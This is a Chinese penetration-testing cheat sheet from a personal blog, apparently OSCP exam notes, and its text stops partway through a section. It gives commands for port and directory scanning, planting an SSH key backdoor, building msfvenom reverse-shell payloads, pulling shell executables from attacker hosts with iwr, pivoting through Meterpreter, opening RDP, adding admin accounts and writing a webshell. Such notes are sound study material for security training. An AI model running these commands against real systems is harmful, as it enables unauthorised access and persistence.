<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="扫描命令12345678910111213141516171819sudo nmap -sC -sS -p0-65535 sandbox.localsudo nmap -p22,80 -sV -A sandbox.local# 端口扫描，多跑几次sudo nmap --min-rate 10000 -p- 192.168.220.118sudo nmap -p22,80 -sV -A sandbo">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透杂项">
<meta property="og:url" content="http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/index.html">
<meta property="og:site_name" content="B00ze Escape">
<meta property="og:description" content="扫描命令12345678910111213141516171819sudo nmap -sC -sS -p0-65535 sandbox.localsudo nmap -p22,80 -sV -A sandbox.local# 端口扫描，多跑几次sudo nmap --min-rate 10000 -p- 192.168.220.118sudo nmap -p22,80 -sV -A sandbo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-06-05T06:35:31.000Z">
<meta property="article:modified_time" content="2024-06-05T06:44:53.523Z">
<meta property="article:author" content="yu1e">
<meta property="article:tag" content="Pentest">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>渗透杂项</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/yu1e">项目</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/06/05/Windows-Privilege-Escalation/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2024/04/17/%E4%BD%BF%E7%94%A8hashcat%E7%A0%B4%E8%A7%A3shadow%E6%96%87%E4%BB%B6/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&text=渗透杂项"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&is_video=false&description=渗透杂项"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透杂项&body=Check out this article: http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&title=渗透杂项"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&name=渗透杂项&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/06/05/%E6%B8%97%E9%80%8F%E6%9D%82%E9%A1%B9/&t=渗透杂项"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E5%91%BD%E4%BB%A4"><span class="toc-number">1.</span> <span class="toc-text">扫描命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSH%E5%90%8E%E9%97%A8"><span class="toc-number">2.</span> <span class="toc-text">SSH后门</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MSF"><span class="toc-number">3.</span> <span class="toc-text">MSF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Meterpreter-Shell"><span class="toc-number">4.</span> <span class="toc-text">Meterpreter Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B7%A8%E5%B9%B3%E5%8F%B0%E7%BC%96%E8%AF%91"><span class="toc-number">5.</span> <span class="toc-text">跨平台编译</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB-Service"><span class="toc-number">6.</span> <span class="toc-text">SMB Service</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8A%A0%E8%A7%A3%E5%AF%86%E7%9B%B8%E5%85%B3"><span class="toc-number">7.</span> <span class="toc-text">字符串加解密相关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%8B%E7%BC%A9%E5%8C%85%E7%A0%B4%E8%A7%A3"><span class="toc-number">8.</span> <span class="toc-text">压缩包破解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="toc-number">9.</span> <span class="toc-text">渗透常用命令</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="toc-number">10.</span> <span class="toc-text">系统常用命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux"><span class="toc-number">10.1.</span> <span class="toc-text">Linux</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows"><span class="toc-number">10.2.</span> <span class="toc-text">Windows</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%80%9D%E8%B7%AF"><span class="toc-number">11.</span> <span class="toc-text">其他思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7"><span class="toc-number">12.</span> <span class="toc-text">工具</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        渗透杂项
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">yu1e</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-06-05T06:35:31.000Z" class="dt-published" itemprop="datePublished">2024-06-05</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Pentest/" rel="tag">Pentest</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="扫描命令"><a href="#扫描命令" class="headerlink" title="扫描命令"></a>扫描命令</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -sC -sS -p0-65535 sandbox.local</span><br><span class="line">sudo nmap -p22,80 -sV -A sandbox.local</span><br><span class="line"># 端口扫描，多跑几次</span><br><span class="line">sudo nmap --min-rate 10000 -p- 192.168.220.118</span><br><span class="line">sudo nmap -p22,80 -sV -A sandbox.local</span><br><span class="line"></span><br><span class="line"># 目录扫描</span><br><span class="line">dirsearch -u http://192.168.212.89 -f -e php,txt,html,zip,rar,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</span><br><span class="line">dirsearch -u http://192.168.237.80 -f -e php,txt,html,zip,rar,tar.gz,tar -w /usr/share/dirb/wordlists/common.txt</span><br><span class="line">gobuster dir -u http://192.168.178.80 -w /usr/share/wordlists/dirb/common.txt</span><br><span class="line">dirsearch -u http://172.16.33.62:7601/ -x 403</span><br><span class="line">dirb http://10.0.2.5/cgi-bin /usr/share/wordlists/dirb/big.txt</span><br><span class="line">gobuster dir -u http://192.168.178.80 -x html,php,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</span><br><span class="line"></span><br><span class="line"># 扫描.zip文件</span><br><span class="line">gobuster dir -u http://192.168.1.22 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .zip</span><br><span class="line"></span><br><span class="line"># Fuzz参数</span><br><span class="line">ffuf -u &#x27;http://192.168.179.80:80/console/file.php?FUZZ=/etc/passwd&#x27; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0</span><br></pre></td></tr></table></figure>

<h2 id="SSH后门"><a href="#SSH后门" class="headerlink" title="SSH后门"></a>SSH后门</h2><p>本地提权之后可以上传ssh公钥，保持长期访问权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ssh -keygen</span><br><span class="line">cat ~/.ssh/id_rsa.pub</span><br><span class="line">mkdir /root/.ssh # 被控机器执行</span><br><span class="line">echo &quot;ssh-rsa AAAxxxxxxx...kali@kali&quot; &gt; /root/.ssh/authorized_keys</span><br><span class="line"></span><br><span class="line">SSH连接目标主机</span><br><span class="line">ssh root@sandbox.local</span><br></pre></td></tr></table></figure>

<h2 id="MSF"><a href="#MSF" class="headerlink" title="MSF"></a>MSF</h2><p>auxiliary是探测类型的模块</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">use 模块名</span><br><span class="line">search 关键字</span><br><span class="line">search type:auxiliary name:smb</span><br><span class="line">sessions 查看当前session</span><br><span class="line">session -i $id 进入指定的session</span><br><span class="line">run -j 后台运行</span><br><span class="line">bg 把当前session放到后台</span><br><span class="line">migrate $PID 进程迁移</span><br></pre></td></tr></table></figure>

<p>除了基本 Payload，Metasploit还包含多种高级 Payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Staged vs Non-Staged Payloads</span><br><span class="line">Non-Staged:不分阶段Payload 与EXP一起被完整地发送到目标系统</span><br><span class="line"></span><br><span class="line">Staged:分阶段Payload通常分为两部分</span><br><span class="line">第一部分较小，负责建立反弹连接，然后传输较大的第二部分Payload 并执行</span><br><span class="line">当没有足够的缓存空间来存储完整的Payload</span><br><span class="line">避免被AV软件发现，第一阶段不包含明显特征的恶意代码，利用其加载第二阶段代码到内存中执行</span><br></pre></td></tr></table></figure>

<p>名称中的‘&#x2F;’用来指示Payload是否分阶段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">不分阶段:shell_reverse_tcp</span><br><span class="line">分阶段:shell/reverse_tcp</span><br></pre></td></tr></table></figure>

<h2 id="Meterpreter-Shell"><a href="#Meterpreter-Shell" class="headerlink" title="Meterpreter Shell"></a>Meterpreter Shell</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">search meterpreter type:payload</span><br><span class="line">set payload windows/meterpreter/reverse_http</span><br></pre></td></tr></table></figure>

<p>上传下载时目标主机路径要加双\</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\Offsec</span><br><span class="line">download c:\\Windows\\system32\\calc.exe /tmp/calc.exe</span><br></pre></td></tr></table></figure>

<p>msfvenom</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.12 LPORT=443 -f exe -o r.exe</span><br><span class="line">然后kali开侦听</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/shell_reverse_tcp</span><br></pre></td></tr></table></figure>

<p>OSCP考试中不能用msf作跳板</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">route add 内网网段</span><br><span class="line">然后msf内部直接访问内网网段即可</span><br></pre></td></tr></table></figure>

<p>除了手动添加内网路由穿透内网，也可以使用autoroute模块，自动利用已建立的Meterpreter会话穿透内网</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(multi/handler) &gt; use multi/manage/autoroute</span><br><span class="line">msf5 post(multi/managelautoroute) &gt; sessions -l</span><br><span class="line">msf5 post(multi/managelautoroute) &gt; set session 4</span><br><span class="line">msf5 post(multi/manage/autoroute) &gt; exploit</span><br></pre></td></tr></table></figure>

<p>结合路由和server&#x2F;socks4a模块，配置socks4a代理，允许外部工具直接访问内网</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msf5 post(multi/manage/autoroute) &gt; use auxiliary/server/socks4a</span><br><span class="line">msf5 auxiliary(server/socks4a) &gt; set SRVHOST 127.0.0.1</span><br><span class="line">msf5 auxiliary(server/socks4a) &gt; exploit -j</span><br></pre></td></tr></table></figure>

<p>配置Proxychains ,挂代理访问内网</p>
<h2 id="跨平台编译"><a href="#跨平台编译" class="headerlink" title="跨平台编译"></a>跨平台编译</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install mingw-w64</span><br><span class="line">i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe #报错</span><br><span class="line">i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32</span><br><span class="line"></span><br><span class="line">编译32位C语言Windows程序</span><br><span class="line">i686-w64-mingw32-gcc</span><br><span class="line">编译64位C语言Windows程序</span><br><span class="line">x86_64-w64-mingw32-gcc</span><br><span class="line">编译32位C++语言Windows程序</span><br><span class="line">i686-w64-mingw32-g++</span><br><span class="line">编译64位C++语言Windows程序</span><br><span class="line">x86_64-w64-mingw32-g++</span><br></pre></td></tr></table></figure>

<h2 id="SMB-Service"><a href="#SMB-Service" class="headerlink" title="SMB Service"></a>SMB Service</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">smbclient -L 192.168.222.11 # 匿名登录smb</span><br><span class="line">smbmap -H 192.168.222.11</span><br><span class="line">smbclient //192.168.222.11/IPC$ # 匿名查看共享目录</span><br><span class="line">遇到SMB服务一定记得试一下能不能put上传文件</span><br><span class="line">enum4linux -a 192.168.0.109 # 枚举用户等各种信息，在拿不到用户名的时候可以尝试</span><br></pre></td></tr></table></figure>

<h2 id="字符串加解密相关"><a href="#字符串加解密相关" class="headerlink" title="字符串加解密相关"></a>字符串加解密相关</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">++++++++++[&gt;+&gt;+++&gt;+++++++&gt;++++++++++&lt;&lt;&lt;&lt;-]&gt;&gt;++++++++++++++++.++++.&gt;&gt;+++++++++++++++++.----.&lt;++++++++++.-----------.&gt;-----------.++++.&lt;&lt;+.&gt;-.--------.++++++++++++++++++++.&lt;------------.&gt;&gt;---------.&lt;&lt;++++++.++++++.</span><br><span class="line">这种叫Brainfuck/Ook! decode</span><br></pre></td></tr></table></figure>

<h2 id="压缩包破解"><a href="#压缩包破解" class="headerlink" title="压缩包破解"></a>压缩包破解</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">zip2john tom.zip &gt;&gt; has1.txt</span><br><span class="line">john has1.txt #会输出压缩包密码</span><br></pre></td></tr></table></figure>

<h2 id="渗透常用命令"><a href="#渗透常用命令" class="headerlink" title="渗透常用命令"></a>渗透常用命令</h2><p>ssh指定密钥登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i key root@ip</span><br></pre></td></tr></table></figure>

<p>echo写入webshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;&lt;?php xxx&gt;&#x27; &gt;&gt; webshell.php.jpg # 单引号</span><br></pre></td></tr></table></figure>

<p>对隐写的文件进行分析提取 -p是指定密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">steghide extract -sf test.jpg -p 123456</span><br></pre></td></tr></table></figure>

<p>绕过restricted shell，一般就ssh加上-t “bash –noprofile”</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/?source=post_page-----c9182b63a4de--------------------------------</span><br></pre></td></tr></table></figure>

<p>shellshock不一定打&#x2F;cgi-bin&#x2F;的cgi文件，打&#x2F;cgi-bin&#x2F;test这种后缀不是cgi的都可以</p>
<p>curl命令进行POST方式上传文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 第一个-F为指定本地上传的文件的路径，@符号必须要有，第二个-F为额外的自定义的参数，可以没有，大部分情况下得有，实际上就是POST传过去的数据</span><br><span class="line">curl -X POST -F &quot;file=@/home/xxx&quot; -F filename=&quot;/tmp/test.txt&quot; http://xxxx.xxx</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"># 生成木马</span><br><span class="line">msfvenom -p payload LPORT= LHOST= -f exe -o eee.exe</span><br><span class="line"></span><br><span class="line"># Windows下载文件</span><br><span class="line">iwr -uri http://192.168.45.192/win_shell.exe -Outfile C:\Windows\Temp\shell.exe</span><br><span class="line"></span><br><span class="line"># 开启3389</span><br><span class="line">REG ADD &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</span><br><span class="line">REG ADD &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&quot; /v PortNumber /t REG_DWORD /d 0x00000d3d /f</span><br><span class="line"></span><br><span class="line"># 修改windows防火墙配置允许3389</span><br><span class="line">netsh advfirewall firewall add rule name=&quot;Remote Desktop&quot; protocol=TCP dir=in localport=3389 action=allow</span><br><span class="line"></span><br><span class="line"># 新增Windows用户并设置为管理员</span><br><span class="line">net user name password /add</span><br><span class="line">net localgroup administrators 用户名 /add</span><br><span class="line"></span><br><span class="line"># Kali开启ssh</span><br><span class="line">sudo systemctl start ssh</span><br><span class="line"></span><br><span class="line"># Windows访问目标机器共享文件夹</span><br><span class="line">Win+R，然后\\目标IP</span><br><span class="line"></span><br><span class="line"># 内网主机发现（ping扫描）</span><br><span class="line">for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i &gt; nul &amp;&amp; echo 10.5.5.%i is up</span><br><span class="line">for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done</span><br><span class="line"></span><br><span class="line"># win下载文件</span><br><span class="line">iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe</span><br><span class="line"></span><br><span class="line"># rdp</span><br><span class="line">xfreerdp /v:192.168.155.152 /u:student /p:lab</span><br></pre></td></tr></table></figure>

<h2 id="系统常用命令"><a href="#系统常用命令" class="headerlink" title="系统常用命令"></a>系统常用命令</h2><h3 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h3><p>查找指定名称的文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">2&gt;/dev/null是将错误信息重定向到垃圾回收系统</span></span><br><span class="line">find / -name Settings.*  2&gt;/dev/null #looking through the files</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.ddosi.org/oscp-cheat-sheet-2/">https://www.ddosi.org/oscp-cheat-sheet-2/</a></p>
<p>which在$PATH环境变量中搜索指定名称的文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo $PATH</span><br><span class="line">which sbd</span><br></pre></td></tr></table></figure>

<p>locate命令，通过搜索locate.db文件来定位目标文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">使用updatedb命令可升级locate.db</span></span><br><span class="line">sudo updatedb</span><br><span class="line">locate sbd.exe</span><br></pre></td></tr></table></figure>

<p>find 命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">彻底搜索文件系统</span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">支持基于名称、时间、大小、所有者、文件类型、时间戮、权限等条件的搜索</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">搜索最近 24 小时修改过的文件</span></span><br><span class="line">find / -mtime 0  </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">搜索最近30分钟修改过的文件</span> </span><br><span class="line">find . -type f -iname &#x27;*.sh&#x27; -mmin -30 -ls </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">对搜索结果执行命令（删除）</span> </span><br><span class="line">find . -name .svn -exec rm -rfo &#123;&#125; \; </span><br><span class="line">find . -name .svn | xargs rm -rf </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">搜索启用 SUID 权限的文件</span></span><br><span class="line">find / -type f -perm -u=s -ls 2&gt;/dev/null </span><br></pre></td></tr></table></figure>

<p>查看系统中可用的服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systemctl list-unit-files</span><br></pre></td></tr></table></figure>

<h3 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h3><p>查看文件内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">type $fileName</span><br></pre></td></tr></table></figure>

<p>查看所有文件（包括隐藏文件）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">dir /a</span><br><span class="line">#查看所有文件及其属性</span><br><span class="line">attrib * </span><br></pre></td></tr></table></figure>

<p>&#x2F;users目录中存放每个用户的个人目录，&#x2F;users&#x2F;public目录是共享目录，所有人都可以访问、写入，如果需要写入文件，可以在该目录下</p>
<p>&#x2F;users&#x2F;username&#x2F;Appdata是一个隐藏文件夹，&#x2F;users&#x2F;username&#x2F;Appdata&#x2F;Roaming是在域环境下可能包含用户配置文件的目录</p>
<p>查看远程目标主机的系统信息（前提是被控机器有目标机器的登录权限，或者知道域的用户名和密码）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systeminfo /s $hostname</span><br><span class="line">systeminfo /s $hostname domain\user /P password</span><br></pre></td></tr></table></figure>

<p>查看系统环境变量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set</span><br></pre></td></tr></table></figure>

<p>搜索当前目录及子目录的文件(powershell)</p>
